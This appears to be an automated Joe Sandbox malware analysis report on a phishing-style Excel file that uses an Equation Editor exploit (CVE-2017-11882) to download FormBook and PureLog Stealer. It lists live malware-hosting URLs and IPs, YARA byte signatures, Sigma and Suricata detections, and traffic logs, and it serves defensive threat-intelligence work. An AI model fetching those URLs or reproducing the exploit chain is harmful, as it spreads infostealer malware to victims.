Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ#51281AOLAI.xls

Overview

General Information

Sample name:RFQ#51281AOLAI.xls
Analysis ID:1483000
MD5:cdf0aba5b4f9e4315f9dfbf906a5c4da
SHA1:74056fd5b1e7456fd00014c677d7b85ef65c4a8a
SHA256:048a0f6be28b03503cde3fecf918773e1dadbe0a50b24c7dc9fe430665bc0cbb
Tags:xls
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1892 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1012 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 1256 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • winiti.exe (PID: 3104 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
      • winiti.exe (PID: 3144 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.winiti.exe.289505c.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          9.2.winiti.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.winiti.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x168e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            9.2.winiti.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              9.2.winiti.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              Click to see the 3 entries

              Sigma Signatures

              Exploits

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internet
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.219.239.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1256, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
              Sigma detected: File Dropped By EQNEDT32EXE
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1256, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

              System Summary

              barindex
              Sigma detected: Equation Editor Network Connection
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1256, Protocol: tcp, SourceIp: 104.219.239.104, SourceIsIpv6: false, SourcePort: 80
              Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
              Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3104, ProcessName: winiti.exe
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3104, ProcessName: winiti.exe
              Sigma detected: Excel Network Connections
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Sigma detected: Suspicious Office Outbound Connections
              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 80
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1892, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Sigma detected: Office Macro File Creation
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

              Snort Signatures

              No Snort rule has matched

              Suricata Signatures

              Timestamp:2024-07-26T13:40:28.015784+0200
              SID:2022050
              Source Port:80
              Destination Port:49166
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T13:40:28.186759+0200
              SID:2022051
              Source Port:80
              Destination Port:49166
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.docAvira URL Cloud: Label: malware
              Source: http://104.219.239.104/80/winiti.exeAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\winiti.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: RFQ#51281AOLAI.xlsJoe Sandbox ML: detected

              Exploits

              barindex
              Office equation editor establishes network connection
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.219.239.104 Port: 80Jump to behavior
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exeJump to behavior
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drStream path '_1783484778/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drStream path '_1783484783/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drStream path '_1783484802/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drStream path '_1783484803/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.drStream path '_1783484806/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: amWV.pdb source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
